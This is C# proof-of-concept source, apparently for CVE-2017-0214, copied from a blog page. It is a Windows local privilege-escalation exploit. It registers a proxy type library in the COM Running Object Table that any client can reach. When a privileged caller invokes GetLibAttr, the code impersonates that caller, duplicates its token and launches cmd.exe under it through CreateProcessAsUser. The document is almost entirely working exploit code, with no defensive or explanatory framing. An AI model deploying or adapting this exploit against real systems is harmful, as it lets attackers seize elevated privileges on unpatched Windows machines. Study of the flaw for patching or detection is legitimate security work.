using Microsoft.Win32.SafeHandles;
using MSSITLB;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Versioning;
using System.Security;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
using IS = System.Runtime.InteropServices;
namespace PoC_RotRegistrationEoP
{
static class Utils
{
[IS.DllImport("rpcrt4.dll")]
static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID);
public static int GetRpcPid()
{
int pid;
if (I_RpcBindingInqLocalClientPID(IntPtr.Zero, out pid) == 0)
{
return pid;
}
return -1;
}
}
[IS.ComVisible(true)]
class TypeInfoWrapper : ITypeInfo2, ITypeInfo
{
private ITypeInfo2 _type_info;
public TypeInfoWrapper(ITypeInfo2 type_info)
{
_type_info = type_info;
}
public TypeInfoWrapper(ITypeInfo type_info)
: this((ITypeInfo2)type_info)
{
}
public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.AddressOfMember(memid, invKind, out ppv);
}
public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.CreateInstance(pUnkOuter, ref riid, out ppvObj);
}
public void GetAllCustData(IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetAllCustData(pCustData);
}
public void GetAllFuncCustData(int index, IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetAllFuncCustData(index, pCustData);
}
public void GetAllImplTypeCustData(int index, IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetAllImplTypeCustData(index, pCustData);
}
public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetAllParamCustData(indexFunc, indexParam, pCustData);
}
public void GetAllVarCustData(int index, IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetAllVarCustData(index, pCustData);
}
public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
ITypeLib type_lib;
_type_info.GetContainingTypeLib(out type_lib, out pIndex);
ppTLB = new TypeLibWrapper(type_lib);
}
public void GetCustData(ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetCustData(ref guid, out pVarVal);
}
public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal);
}
public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
}
public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
}
public void GetFuncCustData(int index, ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetFuncCustData(index, ref guid, out pVarVal);
}
public void GetFuncDesc(int index, out IntPtr ppFuncDesc)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetFuncDesc(index, out ppFuncDesc);
}
public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex);
}
public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetIDsOfNames(rgszNames, cNames, pMemId);
}
public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetImplTypeCustData(index, ref guid, out pVarVal);
}
public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetImplTypeFlags(index, out pImplTypeFlags);
}
public void GetMops(int memid, out string pBstrMops)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetMops(memid, out pBstrMops);
}
public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetNames(memid, rgBstrNames, cMaxNames, out pcNames);
}
public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal);
}
public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
ITypeInfo type_info;
_type_info.GetRefTypeInfo(hRef, out type_info);
ppTI = new TypeInfoWrapper(type_info);
}
public void GetRefTypeOfImplType(int index, out int href)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetRefTypeOfImplType(index, out href);
}
public void GetTypeAttr(out IntPtr ppTypeAttr)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetTypeAttr(out ppTypeAttr);
}
public void GetTypeComp(out ITypeComp ppTComp)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetTypeComp(out ppTComp);
}
public void GetTypeFlags(out int pTypeFlags)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetTypeFlags(out pTypeFlags);
}
public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetTypeKind(out pTypeKind);
}
public void GetVarCustData(int index, ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetVarCustData(index, ref guid, out pVarVal);
}
public void GetVarDesc(int index, out IntPtr ppVarDesc)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetVarDesc(index, out ppVarDesc);
}
public void GetVarIndexOfMemId(int memid, out int pVarIndex)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.GetVarIndexOfMemId(memid, out pVarIndex);
}
public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr);
}
public void ReleaseFuncDesc(IntPtr pFuncDesc)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.ReleaseFuncDesc(pFuncDesc);
}
public void ReleaseTypeAttr(IntPtr pTypeAttr)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.ReleaseTypeAttr(pTypeAttr);
}
public void ReleaseVarDesc(IntPtr pVarDesc)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_type_info.ReleaseVarDesc(pVarDesc);
}
}
[StructLayout(LayoutKind.Sequential)]
internal class PROCESS_INFORMATION
{
// The handles in PROCESS_INFORMATION are initialized in unmanaged functions.
// We can't use SafeHandle here because Interop doesn't support [out] SafeHandles in structures/classes yet.
public IntPtr hProcess = IntPtr.Zero;
public IntPtr hThread = IntPtr.Zero;
public int dwProcessId = 0;
public int dwThreadId = 0;
// Note this class makes no attempt to free the handles
// Use InitialSetHandle to copy to handles into SafeHandles
}
[IS.ComVisible(true)]
class TypeLibWrapper : ITypeLib2, ITypeLib
{
[DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)]
[return: MarshalAs(UnmanagedType.Interface)]
static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
Guid gd=new Guid("{0000013E-0000-0000-C000-000000000046}");
private ITypeLib2 _tlb;
public TypeLibWrapper(ITypeLib2 tlb)
{
_tlb = tlb;
}
public TypeLibWrapper(ITypeLib tlb)
: this((ITypeLib2)tlb)
{
}
[IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)]
static extern ITypeLib LoadTypeLib(string strTypeLibName);
public TypeLibWrapper(string typelibname)
{
try
{
_tlb = (ITypeLib2)LoadTypeLib(typelibname);
int a = 0;
}
catch (Exception)
{
throw;
}
}
public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound);
}
public void GetAllCustData(IntPtr pCustData)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetAllCustData(pCustData);
}
public void GetCustData(ref Guid guid, out object pVarVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetCustData(ref guid, out pVarVal);
}
public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
}
public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
}
internal const String ADVAPI32 = "advapi32.dll";
internal const String KERNEL32 = "kernel32.dll";
[DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")]
[ResourceExposure(ResourceScope.None)]
internal static extern bool
OpenCurrentThreadToken(
[In] IntPtr ThreadHandle,
[In] TokenAccessLevels DesiredAccess,
[In] bool OpenAsSelf,
[Out] out IntPtr TokenHandle);
[DllImport(KERNEL32, SetLastError = true)]
[ResourceExposure(ResourceScope.None)]
internal static extern IntPtr
GetCurrentThread();
internal enum SECURITY_IMPERSONATION_LEVEL
{
Anonymous = 0,
Identification = 1,
Impersonation = 2,
Delegation = 3,
}
[Serializable]
internal enum TokenTypeVal : int
{
TokenPrimary = 1,
TokenImpersonation
}
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
[DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)]
[ResourceExposure(ResourceScope.None)]
internal static extern
bool DuplicateTokenEx(
[In] IntPtr ExistingTokenHandle,
[In] TokenAccessLevels DesiredAccess,
[In] IntPtr TokenAttributes,
[In] SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
[In] TokenTypeVal TokenType,
[In, Out] ref IntPtr DuplicateTokenHandle);
[DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)]
[System.Security.SuppressUnmanagedCodeSecurityAttribute()]
[ResourceExposure(ResourceScope.Machine)]
public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes,
ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation);
[StructLayout(LayoutKind.Sequential)]
public struct StartupInfo
{
public int cb;
public String lpReserved;
public String lpDesktop;
public String lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct ProcessInformation
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct SecurityAttributes
{
public int Length;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}
[DllImport("ole32.dll")]
static extern int CoQueryClientBlanket(out IntPtr pAuthnSvc, out IntPtr pAuthzSvc,
[MarshalAs(UnmanagedType.LPWStr)] out StringBuilder pServerPrincName, out IntPtr
pAuthnLevel, out IntPtr pImpLevel, out IntPtr pPrivs, out IntPtr pCapabilities);
public void GetLibAttr(out IntPtr ppTLibAttr)
{
System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe");
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
Console.WriteLine("firstShoot");
IntPtr threadPtr1=IntPtr.Zero;
IntPtr threadPtr23=IntPtr.Zero;
IntPtr threadPtr3=IntPtr.Zero;
IntPtr threadPtr4=IntPtr.Zero;
IntPtr threadPtr5=IntPtr.Zero;
IntPtr threadPtr6=IntPtr.Zero;
StringBuilder sb = new StringBuilder();
CoQueryClientBlanket(out threadPtr1, out threadPtr23,out sb, out threadPtr3, out threadPtr4, out threadPtr5, out threadPtr6);
string s = sb.ToString();
IntPtr tokenHandle = IntPtr.Zero;
IntPtr threadPtr = GetCurrentThread();
bool isSuccess = OpenCurrentThreadToken(threadPtr, TokenAccessLevels.Query, true, out tokenHandle);
Console.WriteLine("threadPtr1is:" + tokenHandle);
IServerSecurity pss = CoGetCallContext(gd) as IServerSecurity;
int a = pss.ImpersonateClient();
IntPtr tokenHandle2 = IntPtr.Zero;
IntPtr threadPtr2 = GetCurrentThread();
isSuccess = OpenCurrentThreadToken(threadPtr2, TokenAccessLevels.Query, true, out tokenHandle2);
Console.WriteLine("threadPtr2is:" + tokenHandle2);
IntPtr hToken2 = IntPtr.Zero;
var sa = new SecurityAttributes { bInheritHandle = false };
sa.Length = Marshal.SizeOf(sa);
isSuccess = DuplicateTokenEx(tokenHandle2, TokenAccessLevels.MaximumAllowed, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Identification, TokenTypeVal.TokenPrimary, ref hToken2);
Console.WriteLine("DuplicateTokenEx:" + tokenHandle + "err:" + Marshal.GetLastWin32Error());
sa.lpSecurityDescriptor = (IntPtr)0;
var si = new StartupInfo();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = "";
// ReSharper disable once RedundantAssignment
var pi = new ProcessInformation();
isSuccess = CreateProcessAsUser(tokenHandle2, "cmd.exe", @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, (IntPtr)0, "C:\\", ref si, out pi);
Console.WriteLine("CreateProcessAsUser:" + isSuccess);
//IntPtr pwz = IntPtr.Zero;
//IntPtr pwz2 = IntPtr.Zero;
//pss.QueryBlanket(IntPtr.Zero, IntPtr.Zero, pwz, IntPtr.Zero, IntPtr.Zero, pwz2, IntPtr.Zero);
//string s = Marshal.PtrToStringAuto(pwz);
//string s2 = Marshal.PtrToStringAuto(pwz2);
//System.Diagnostics.Process p = new System.Diagnostics.Process();
//p.StartInfo.FileName = @"cmd.exe";
//p.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
//p.Start();//启动程序
//p.WaitForExit();
_tlb.GetLibAttr(out ppTLibAttr);
return;
}
public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames);
}
public void GetTypeComp(out ITypeComp ppTComp)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetTypeComp(out ppTComp);
}
public void GetTypeInfo(int index, out ITypeInfo ppTI)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
ITypeInfo type_info;
_tlb.GetTypeInfo(index, out type_info);
ppTI = new TypeInfoWrapper(type_info);
}
public int GetTypeInfoCount()
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
return _tlb.GetTypeInfoCount();
}
public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
ITypeInfo type_info;
_tlb.GetTypeInfoOfGuid(ref guid, out type_info);
ppTInfo = new TypeInfoWrapper(type_info);
}
public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.GetTypeInfoType(index, out pTKind);
}
public bool IsName(string szNameBuf, int lHashVal)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
return _tlb.IsName(szNameBuf, lHashVal);
}
public void ReleaseTLibAttr(IntPtr pTLibAttr)
{
Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
_tlb.ReleaseTLibAttr(pTLibAttr);
}
}
[ComImport]
[Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")]
public class mytestcom
{
}
[ComImport]
[Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")]
public interface Imytestcom
{
void mdtest();
}
[ComImport,
Guid("0000013E-0000-0000-C000-000000000046"),
InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
internal interface IServerSecurity
{
void QueryBlanket
(
IntPtr authnSvc,
IntPtr authzSvc,
IntPtr serverPrincipalName,
IntPtr authnLevel,
IntPtr impLevel,
IntPtr clientPrincipalName,
IntPtr Capabilities
);
[PreserveSig]
int ImpersonateClient();
[PreserveSig]
int RevertToSelf();
[PreserveSig]
[return: MarshalAs(UnmanagedType.Bool)]
bool IsImpersonating();
}
class Program
{
const String OLEAUT32 = "oleaut32.dll";
[DllImport(OLEAUT32,
ExactSpelling = true,
CharSet = CharSet.Unicode,
PreserveSig = true)]
[ResourceExposure(ResourceScope.None)]
internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid,
[MarshalAs(UnmanagedType.Interface)] out object typeLib);
const int RPC_C_AUTHN_LEVEL_DEFAULT = 0;
const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
const int EOAC_APPID = 8;
[IS.DllImport("ole32.dll")]
static extern int CoInitializeSecurity(
ref Guid pSecDesc,
int cAuthSvc,
IntPtr asAuthSvc,
IntPtr pReserved1,
int dwAuthnLevel,
int dwImpLevel,
IntPtr pAuthList,
int dwCapabilities,
IntPtr pReserved3
);
[return: IS.MarshalAs(IS.UnmanagedType.Interface)]
[IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
static extern IMoniker CreateFileMoniker(string lpszPathName);
[return: IS.MarshalAs(IS.UnmanagedType.Interface)]
[IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
static extern IRunningObjectTable GetRunningObjectTable(int reserved);
const int ROTFLAGS_ALLOWANYCLIENT = 2;
const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1;
static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}");
[MTAThread]
static void Main(string[] args)
{
try
{
// (new mytestcom() as Imytestcom).mdtest();
//byte[] bs = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll"));
// File.WriteAllBytes("c:\\123\\1.raw",bs);
if (args.Length < 1)
{
Console.WriteLine("Usage: fake_typelib|-x");
return;
}
if (args[0] == "-x")
{
//Console.WriteLine("Running PoC");
//Type t = Type.GetTypeFromCLSID(new Guid("9E175B68-F52A-11D8-B9A5-505054503030"));
//IGatherManagerAdmin2 mgr = (IGatherManagerAdmin2)Activator.CreateInstance(t);
//mgr.GetBackoffReason(0x12345678);
Type t = Type.GetTypeFromCLSID(new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480"));
Activator.CreateInstance(t);
// (new mytestcom() as Imytestcom).mdtest();
}
else
{
//modified vervion
string tlb_path = "C:\\project\\testalt\\Debug\\testalt.dll";
// string tlb_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll");
// Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
// Guid appid = tapi3guid;
//new gen guid
// Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
Guid appid = new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}");
//old
// Guid appid = new Guid("{d056ebce-e7e9-4994-a5e6-de59430306c1}");
//
int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero,
RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero);
if (hr != 0)
{
IS.Marshal.ThrowExceptionForHR(hr);
}
TypeLibWrapper tlb = new TypeLibWrapper("C:\\123\\sys\\testalt.dll");
IMoniker moniker = CreateFileMoniker(tlb_path);
IRunningObjectTable rot = GetRunningObjectTable(0);
int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE;
// int flags = 0;
int cookie = rot.Register(flags, tlb, moniker);
byte[] bts = new byte[4096];
/// (new mytestcom() as Imytestcom).mdtest();
Console.ReadKey();
using (FileStream stm = new FileStream(tlb_path, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete))
{
stm.Lock(0, 4096);
Console.WriteLine("Waiting");
// Guid g = new Guid("{21D6D48E-A88B-11D0-83DD-00AA003CCABD}");
//frompoc
Guid g = new Guid("{9E175B68-F52A-11D8-B9A5-505054503030}");
object tpLib;
// int b= LoadRegTypeLib(ref tapi3guid, 1, 0, 0, out tpLib);
while (stm.Read(bts, 0, 4096) > 0)
{
//Type t = Type.GetTypeFromCLSID(g);
//Activator.CreateInstance(t);
Process ps = Process.Start(Process.GetCurrentProcess().MainModule.FileName, "-x");
ps.WaitForExit();
Console.ReadKey();
Console.WriteLine("Exited");
}
Console.ReadKey();
}
rot.Revoke(cookie);
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
Console.ReadKey();
}
}
}
CVE-2017-0214Poc
最新推荐文章于 2020-09-09 19:40:49 发布